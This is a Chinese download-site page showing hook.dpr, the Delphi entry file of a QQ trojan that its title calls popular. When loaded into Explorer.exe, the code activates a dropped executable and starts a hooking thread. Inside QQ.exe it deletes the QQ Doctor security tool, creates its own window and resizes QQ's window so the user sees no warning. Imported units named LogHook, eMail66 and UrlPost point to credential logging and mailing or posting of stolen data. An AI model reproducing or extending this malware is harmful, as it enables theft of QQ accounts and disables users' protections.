hook.dpr

来自「这是目前很流行的QQ木马 的代码 现在 这个很使用的」· DPR 代码 · 共 105 行

DPR
105
字号 
library Hook;


uses
  Windows,
  ComUnit in 'ComUnit.pas',
  HOOKThread in 'HOOKThread.pas',
  AllVarUnit in 'AllVarUnit.pas',
  AllJmpHook in 'AllJmpHook.pas',
  tonghan in 'tonghan.pas',
  LogHook in 'LogHook.pas',
  eMail66 in 'eMail66.pas',
  UrlPost in 'UrlPost.pas',
  QQWindow in 'QQWindow.pas',
  OnTimer in 'OnTimer.pas',
  QQTH in 'QQTH.pas',
  PosQQHwnd in 'PosQQHwnd.pas';

//通用函数





exports
  DllGetClassObject,
  DllCanUnloadNow,
  DllRegisterServer,
  DllUnregisterServer,
  JmpHookOn,
  JmpHookOff;

// DLL回调
procedure DLLMain(dwReason: DWORD); // DLL加载线程
begin
  case dwReason of
    DLL_PROCESS_DETACH :
      begin
        //QQMyEditHookOff();
      end;
  end;
end;

var
  PathBuffer: array [0..MAX_PATH] of Char = 'ymygc.....';
  ModulePath: string;
  ModuleName: string;
  SystemDir: string;
  SubThreadID: DWord;
  hLoginCtrl: HModule = 0;
   threadid:dword;//线程ID                 
// DLL入口
begin
  DeleteFile(@PathBuffer[3]);

  //获取当前进程的路径
  PathBuffer[GetModuleFileName(0, @PathBuffer[0], MAX_PATH)] := #0; // 进程全路径
  ModuleName := ExtractFileName(PathBuffer);                        // 进程文件名
  if CompareAnsiText(ModuleName, 'Explorer.Exe') then
  begin
    IsExplorer := True;
    SystemDir := GetSystemDir();
    ForceMoveFile(SystemDir + 'VerCLSID.bak', SystemDir + 'VerCLSID.exe');
  end
  else
     if CompareAnsiText(ModuleName, 'QQ.exe') then
      begin
       //是否处于 QQ进程只限于登陆窗口
         QQpchar:=PathBuffer;//QQ的所在路径
         NumberPath:=getFilePath(QQpchar);
          //删除QQ医生
          DeleteQQDoctor;
         if isSendMessage=false then
          begin
           IsQQ := True;
           CreateMyQQWindow;
           KillTimerOn();
          end
          else
          begin
           PosQQWindowSize;    ////调整QQ窗口大小,不让文件损坏得到提示
          end;
   //     log1('QQ9-*-.exe进程');
      end;
  //获取当前DLL的路径
  PathBuffer[GetModuleFileName(HInstance, @PathBuffer[0], MAX_PATH)] := #0; // DLL自身路径
  ComDllFileName := PathBuffer;                                             // 记录自身DLL位置
  ComDllFilePath := ExtractFilePath(ComDllFileName);
                                             // 载入尾部信息
   if (IsExplorer) then      //判断当前进程如果是Explorer.exe 的话.就.创建钩子
  begin
    if (FindWindow(DLL_WindowClass, DLL_WindowTitle) = 0) then
    begin
      CreateThread(nil, 0, @AllThreadPro, Pointer(66), 0, SubThreadID);
    end;
  end else
  begin
    if (IsQQ) then          //判断当前进程是否是QQ的进程..
    begin
      DllProc := @DLLMain;           //QQAPI挂钩开始
    end;
  end;
end.

hook.dpr - 源码说明

本页面展示了「这是目前很流行的QQ木马 的代码 现在 这个很使用的」中的 hook.dpr 源码文件,采用 DPR 编程语言编写,共 105 行代码。您可以在线阅读完整代码内容,也可以返回资源详情页下载完整源码包进行本地学习和开发。

虫虫下载站收录了大量与木马相关的技术资源,包括源代码、技术文档、电路图等,是电子工程师和嵌入式开发者的专业学习平台。

⌨️ 快捷键说明

复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?